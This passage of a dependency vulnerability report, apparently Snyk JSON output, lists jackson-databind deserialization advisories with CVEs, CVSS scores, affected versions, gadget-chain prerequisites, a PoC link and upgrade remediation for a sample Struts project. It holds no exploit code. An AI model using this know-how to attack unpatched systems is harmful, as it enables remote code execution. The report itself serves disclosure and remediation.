The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2698)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.91508", + "probability": "0.03404", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14061" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-c2q3-4qrh-fm48" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-06-15T11:03:46.232208Z", + "functions_new": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-15T10:59:39Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2020-06-15T15:45:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.565244Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.9.2", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", + "title": "GitHub Comparison" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2387", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2389", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2395", + "title": "GitHub Issue" + }, + { + "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", + "title": "Snyk Blog" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": 
"2024-03-11T09:47:46.065762Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:35.581531Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.009523Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:46.065762Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:35.581531Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. `SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14379](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", + "epssDetails": { + "percentile": "0.45827", + "probability": "0.00116", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14439" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6fpp-rgj9-8rwc", + "GHSA-gwp4-hfv6-p7hw" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2023-11-14T13:41:26.478840Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2019-07-29T12:40:42Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-07-29T12:40:42Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:35.581531Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-608664", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.6)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.9.10.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.9.4,2.9.10.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", + "className": "SubTypeValidator", + "functionName": "validateSubType" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2814", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Kamimuka/cve-2020-24616-poc", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:13.383929Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:47.311633Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:03.282990Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:13.383929Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.311633Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `br.com.anteros.dbcp.AnterosDBCPDataSource` (aka Anteros-DBCP).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). 
It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2814)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Kamimuka/cve-2020-24616-poc)\n", + "epssDetails": { + "percentile": "0.85138", + "probability": "0.01172", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-24616" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-08-26T11:28:06.617646Z", + "functions_new": [ + { + "version": [ + "[2.9.4,2.9.10.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.jsontype.impl.SubTypeValidator", + "functionName": "validateSubType" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-08-26T11:26:14Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-08-26T14:27:29Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:50:47.311633Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": 
[], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72445", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.4", + "2.8.11.2", + "2.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2052", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:41.204259Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:36.643590Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 
8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:45.496040Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:41.204259Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:36.643590Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12022`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14723` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2052)\n", + "epssDetails": { + "percentile": "0.81303", + "probability": "0.00770", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-12022" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cjjf-94ff-43w7", + "GHSA-wrr7-33fx-rcvj" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:11:34.234921Z", + "functions_new": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-05-29T17:00:04Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:00:03Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:36.643590Z", + "socialTrendAlert": false, + 
"packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72446", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.4", + "2.8.11.2", + "2.9.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0, 2.8.11.2)", + "[2.9.0, 2.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2032", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 5.6, + "modificationTime": "2024-03-11T09:47:14.962980Z" + }, + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + 
"modificationTime": "2024-03-11T09:47:26.624837Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:53.818908Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:14.962980Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:26.624837Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It may allow content exfiltration (remote access by sending contents over ftp) when untrusted content is deserialized with default typing enabled. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-11307`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-14723`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
